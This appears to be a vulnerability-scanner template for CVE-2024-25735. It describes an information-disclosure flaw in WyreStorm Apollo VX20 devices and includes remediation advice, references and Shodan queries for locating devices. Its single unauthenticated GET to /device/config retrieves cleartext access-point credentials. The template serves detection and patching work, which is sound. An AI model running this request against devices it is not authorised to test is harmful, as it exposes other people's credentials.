id: CVE-2024-25735

info:
  name: WyreStorm Apollo VX20 - Information Disclosure
  author: johnk3r
  severity: high
  description: |
    An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
  impact: |
    Unauthenticated attackers can access cleartext credentials for the SoftAP Router via the /device/config endpoint.
  remediation: |
    Update WyreStorm Apollo VX20 to version 1.3.58 or later.
  reference:
    - https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
    - https://packetstormsecurity.com/files/cve/CVE-2024-25735
    - http://packetstormsecurity.com/files/177082
    - https://hyp3rlinx.altervista.org
    - https://github.com/codeb0ss/CVE-2024-25735-PoC
  classification:
    epss-score: 0.90358
    epss-percentile: 0.99619
  metadata:
    verified: true
    max-request: 1
    vendor: wyrestorm
    product: apollo vx20
    shodan-query:
      - ssl:"WyreStorm Apollo VX20"
      - ssl:"wyrestorm apollo vx20"
  tags: packetstorm,cve,cve2024,wyrestorm,info-leak,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/device/config"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"password":'
          - '"softAp":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 490a0046304402203a743d894f32e38831cd7e667ea420192260679376627c3672ac2a00d56bbdc2022066c985457cdb187c02910d3817a9b2fe76929b5b017bb72987a13420f3ce7f6a:922c64590222798bb761d5b6d8e72950